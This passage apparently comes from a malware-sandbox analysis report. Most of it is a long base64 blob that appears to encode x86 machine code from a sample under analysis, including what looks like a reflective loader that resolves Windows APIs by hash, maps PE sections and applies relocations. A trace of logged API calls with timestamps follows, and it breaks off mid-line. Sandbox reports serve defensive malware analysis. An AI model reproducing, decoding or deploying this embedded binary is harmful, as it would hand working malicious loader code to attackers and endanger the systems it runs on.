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AQf/3X4i8eLy+hpsf//WVnrOotFDI1N9FH/dfiJRfRQi8eL88YEHwDop7D//4PEDOlE/////3UM/3X4V2pBxgQfAIv76OKv//+DxBCL+IX/D4R4////V/91+FPo+yoBAIPEDMYEHwDpzv7//2vAA7kAIAAAO8GJRxR9A4lPFItHFFa+AAQAAAPGa8ADUOjW6f//WYvQiUcg6Jjq//+LVyCJB+iO6v//i1cgiUcE6IPq//+LdxSLVyCJRwjoder//4t3FItXIIlHDOhn6v//i3cUi1cgiUcY6Fnq//+DZxAAiUccXsNWi3Ag6Lrp//9ew1FKVleD+mIPh48DAAD/JJWlhgAQagFqAVFQ6FHB//+DxBDpdQMAAGoBi9Don8D//+lmAwAA6G+e///pXQMAAIvQ6Oae///pUQMAAFCL8ehqnv//6UMDAABoXMcCEFFQ6FGj//+DxAzpMAMAAFFQ6Fa3//9Z6SIDAABQi/Ho457//+kVAwAAagFRUOi/GQAA69OL0YvI6Cfs///p/QIAAFHoKO7//+nxAgAA6GDu///p6AIAAFDos+v//+ncAgAAagFR6LLD///rqug5uf//6ckCAABR6CDf///pvQIAAOhd4P//6bQCAADoy97//+mqAgAA6KYeAADpoAIAAOhpHQAA6ZYCAABRUOhfHwAA6WH///9RUOgvo///6VX///9RUOgkBQAA6Un///+L0OhQBAAA6WYCAABQi/no0fL//+lYAgAAUVDo7Z///+kk////6Huk///pQwIAAFEzyVDoE9v//+kM////6Dnc///pKwIAAIvQ6JXc///pHwIAAGoA6aX+//9qAWoA6Yv+//9qAVGL8Ogtw///6df+//9qAOvvi9DojKT//+nwAQAAUVDo49P//+m7/v//UVDoFCEAAOmv/v//i9DoRvH//+nMAQAAi9Do5PH//+nAAQAAUVDo8qT//+mL/v//UVDo3br//+l//v//i9Doqrn//+mcAQAAi9Dolbj//+mQAQAAi9DoULn//+mEAQAAUVDobqX//+lP/v//UVDo4Kb//+lD/v//i9DogSMAAOlgAQAAUIvx6J+q///pUgEAAOgiq///6UkBAABRM8lB6QD///9oYMcCEOn3/f//UOib4P//6SoBAABqAOkQ/v//agFqAVFQ6HvD///pl/3//2oBagDr7lDoeZz//+kCAQAAUVDoLrn//+nO/f//UVDoorn//+nC/f//i9DojfT//+nfAAAAUVDodp3//+mq/f//UVDof6v//+me/f//UVDo6J///+mS/f//i9DoYPH//+mvAAAAi9DopcP//+mjAAAAUVDo9xEAAOlu/f//i9DoWvD//+mLAAAAUVDodYr//+lW/f//UegIi///63bopov//+twUVDoJOP//+k7/f//agDpO////2oA6UT///9qAOnJ/P//agDpMv7//2oA6Wb9//+L0Oj/8v//6zhqAVFQ6DvA///p8vz//2oA6/CL0Ojc0f//6x1qAYvQ6Dq////rEWoA6/NqAesCagCL0OiAvv//WV9eWcMZgwAQoYYAEDqDABBEgwAQUIMAEKGGABChhgAQoYYAECyDABBdgwAQcYMAEH6DABCLgwAQloMAEKSDABCvgwAQuYMAEMSDABDOgwAQoYYAEKGGABDYgwAQ44MAEO2DABChhgAQoYYAEPeDABABhAAQF4QAEKGGABALhAAQI4QAEC+EABChhgAQoYYAEKGGABA7hAAQSIQAEFSEABBehAAQbIQAEHaEABCChAAQiYQAEJKEABChhAAQpYQAELGEABC9hAAQyYQAENWEABDhhAAQ7YQAEPmEABAFhQAQEYUAEB2FABAphQAQNYUAEEGFABBOhQAQWIUAEKGGABChhgAQoYYAEKGGABBhhQAQa4UAEHaFABB9hQAQjYUAEJOFABCehQAQqoUAELaFABDChQAQzoUAENqFABDmhQAQ8oUAEP6FABAKhgAQFoYAECKGABAqhgAQMYYAED2GABBEhgAQS4YAEFKGABBZhgAQYIYAEGmGABB3hgAQe4YAEISGABCPhgAQk4YAEJeGABBVi+yD7AxTVjP2OXUIdjSLBD6LXD4EUOj1ogEAU4lF+OjsogEAi8iNXDEIO10IdyGLVfiNRD4I6Jj6//+L8zt1CHLM/3UIagBX6NE2AQCDxAxeW8nDVYvsg+wQg2XwAFZXM8CNffSrq6uNRfDoQuT//4vw6Efk//+L+FdqAGoB/xWsYAIQi/CF9nQNagBW/xVcYQIQhcB1Ev8VnGECEFBXaiPo9pD//4PEDFb/FYhhAhBfXsnDVYvsUY1F/FBqCP91CP8VbGACEIXAdQLJw1ZoAAgAAP91/OifGAAAWVn/dfyL8P8ViGECEIvGXsnDVYvs6NhCAACFwHUT/xWEYQIQUOjmp///WYXAdQJdw/91COjXp///99gbwFlAXcNVi+yB7FQJAAChEAADEDPFiUX8U1ZXaP8HAAAz/42F+ff//1dQxoX49///AOjRNQEAi00Mi1UIjYWs9v//6FTj//+L8OhZ4///iYXM9v//jYWs9v//aACAAABQ6D2M//+DxBQ5vcz2//9+Ev+1zPb//421rPb//+hUjP//Wf8VhGECEFDoRqf//1mFwHQMx4XI9v//ZMcCEOsd6BJCAADHhcj2//9kxwIQhcB1CseFyPb//2jHAhBXagLoQ7YAAIvwibW89v//g/7/D4RsAQAAjYXQ9v//UFbHhdD2//8oAQAA6CG2AACFwHUMVv8ViGECEOlFAQAAix2IYQIQ/7XY9v//V+ix3///99gbwCUADAAABQAEAABQ/xWsYAIQiYXE9v//O8d1K/+12Pb//42F9Pb///+16Pb//421rPb//1BobMcCEOjYi///g8QQ6YYAAABQjb349///6Dn+//9ZhcB1BoiF+Pf//42FwPb//1D/tdj2////FShhAhCFwHUHg43A9v////+1xPb//+g8pv//hcBZuGjHAhB1BouFyPb///+1wPb//42N+Pf//1FQ/7XY9v//jYX09v///7Xo9v//jbWs9v//UGh4xwIQ6E+L//+DxBwz//+1xPb////TjYXQ9v//UP+1vPb//+gbtQAAhcAPhQL/////tbz2////042FrPb//zm9zPb//3UEahHrAmoW6F2L//9QjYWs9v//6E6L//9Q6L+H//+DxAyNhaz2///oIYv//4tN/F9eM81b6Mu0AADJw1WL7FZXvgCAAABW6KW1AAD/dQyL+P91CGjsxQIQVlfo6bYAAP91FP91EFfoDQAAAFfoorQAAIPEKF9eXcNVi+xRU1ZXuwCAAABT6Ga1AAD/dQiL+GiMxwIQU1forbYAAIt1DIPEFFZX/xWQYAIQV4lF/OhhtAAAg338/1l0fvYGEI1GLHR7agK/lMcCEIvwWTPS86Z0TIvwagO/mMcCEFkzwPOmdDxT6Am1AACLdQyDxixWaFjFAhCL+FNX6Ey2AAD/dRD/dQxW/3UI6DD///9qAVf/dQj/VRBX6PmzAACDxDSLdQxW/3X8/xWgYAIQhcB1i/91/P8VmGACEF9eW8nDagBQ/3UI/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") returned 0x47a57 [0056.901] ??2@YAPEAX_K@Z () returned 0x68a880 [0056.901] malloc (_Size=0x1008) returned 0x68a8c0 [0056.902] ??2@YAPEAX_K@Z () returned 0x68b8d0 [0056.902] malloc (_Size=0x400) returned 0x68ba60 [0056.902] malloc (_Size=0x108) returned 0x687910 [0056.902] malloc (_Size=0x2008) returned 0x68be70 [0056.903] malloc (_Size=0x208) returned 0x68de80 [0056.903] malloc (_Size=0x200) returned 0x68e090 [0056.903] realloc (_Block=0x68e090, _Size=0x400) returned 0x68e090 [0056.903] realloc (_Block=0x68e090, _Size=0x800) returned 0x68e090 [0056.903] realloc (_Block=0x68e090, _Size=0x1000) returned 0x68e090 [0056.903] realloc (_Block=0x68e090, _Size=0x2000) returned 0xcdfb0 [0056.903] realloc (_Block=0xcdfb0, _Size=0x4000) returned 0xcffc0 [0056.904] realloc (_Block=0xcffc0, _Size=0x8000) returned 0xd3fd0 [0056.905] realloc (_Block=0xd3fd0, _Size=0x10000) returned 0xdbfe0 [0056.906] realloc (_Block=0xdbfe0, _Size=0x20000) returned 0xebff0 [0056.908] realloc (_Block=0xebff0, _Size=0x40000) returned 0x10c000 [0056.913] realloc (_Block=0x10c000, _Size=0x80000) returned 0x2f50080 [0056.923] realloc (_Block=0x2f50080, _Size=0x100000) returned 0x2a10040 [0056.935] malloc (_Size=0x8803a) returned 0x2f50080 [0056.938] malloc (_Size=0x408) returned 0x68e090 [0056.939] malloc (_Size=0x1008) returned 0x68ecb0 [0056.941] malloc (_Size=0x2008) returned 0x2fd80d0 [0056.942] malloc (_Size=0x4008) returned 0x2fda0e0 [0056.945] malloc (_Size=0x4008) returned 0x2fde0f0 [0056.951] realloc (_Block=0x2fea120, _Size=0x4b0) returned 0x2fea120 [0056.951] realloc (_Block=0x2fea120, _Size=0x708) returned 0x2fea120 [0056.973] ??2@YAPEAX_K@Z () returned 0x689f50 [0056.974] free (_Block=0x2fe2100) [0056.981] free (_Block=0x2fda0e0) [0056.981] free (_Block=0x68be70) [0056.985] free (_Block=0x2f50080) [0056.985] free (_Block=0x68a8c0) [0056.986] ??3@YAXPEAX@Z () returned 0x49361a01 [0056.986] free (_Block=0x68ba60) [0056.986] free (_Block=0x2fea120) [0056.988] free (_Block=0x2fe6110) [0056.988] free (_Block=0x2fde0f0) [0056.989] free (_Block=0x2fd80d0) [0056.997] free (_Block=0x68ecb0) [0056.997] free (_Block=0x68e4a0) [0056.998] free (_Block=0x68e090) [0056.998] free (_Block=0x68de80) [0056.998] free (_Block=0x687910) [0056.998] ??2@YAPEAX_K@Z () returned 0x2f50080 [0056.998] ??2@YAPEAX_K@Z () returned 0x2f500e0 [0056.998] malloc (_Size=0x10) returned 0x2f50110 [0056.999] ??2@YAPEAX_K@Z () returned 0x2f50130 [0056.999] ISystemDebugEventFire:IsActive (This=0x4dbce0) returned 0x1 [0057.000] malloc (_Size=0x988) returned 0x2f50180 [0057.001] GetCurrentThreadId () returned 0xf14 [0057.001] GetCurrentThreadId () returned 0xf14 [0057.001] ??2@YAPEAX_K@Z () returned 0x2f50b10 [0057.002] ??2@YAPEAX_K@Z () returned 0x2f50b60 [0057.002] ??3@YAXPEAX@Z () returned 0x49361a01 [0057.003] ??2@YAPEAX_K@Z () returned 0x2f50b60 [0057.005] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x45bc40 [0057.006] GetCurrentThreadId () returned 0xf14 [0057.006] _wcsicmp (_String1="window", _String2="window") returned 0 [0057.006] GetCurrentThreadId () returned 0xf14 [0057.006] GetCurrentThreadId () returned 0xf14 [0057.006] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x40) returned 0x45bc90 [0057.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.010] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.012] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x58) returned 0x44c910 [0057.012] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x410) returned 0x1e30080 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e08c0 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e08f0 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0920 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0950 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0980 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e09b0 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e09e0 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0a10 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0a40 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0a70 [0057.013] RtlAllocateHeap 